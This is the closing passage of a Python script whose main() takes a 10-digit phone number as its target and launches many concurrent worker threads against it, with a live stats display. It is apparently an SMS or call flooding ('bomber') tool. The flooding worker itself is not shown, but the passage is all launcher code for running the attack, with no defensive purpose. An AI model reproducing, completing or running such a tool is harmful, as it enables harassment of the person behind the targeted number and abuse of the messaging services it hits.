        time.sleep(STATS_REFRESH)

def main():
    global target, running
    if len(sys.argv) > 1:
        target = sys.argv[1]
    else:
        target = input("\033[1;97mEnter Number  : \033[0m").strip()
    if not target.isdigit() or len(target) != 10:
        console.print("[bold red]Invalid number. Must be 10 digits.[/bold red]")
        return

    stop_event = threading.Event()
    threads = []
    for _ in range(THREAD_COUNT):
        t = threading.Thread(target=worker, args=(target, stop_event))
        t.daemon = True
        t.start()
        threads.append(t)

    stats_thread = threading.Thread(target=stats_display)
    stats_thread.daemon = True
    stats_thread.start()

    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        console.print("\n[red]Stopping...[/red]")
        running = False
        stop_event.set()
        for t in threads:
            t.join(timeout=1)
        console.print("[green]Stopped.[/green]")

if __name__ == "__main__":
    main()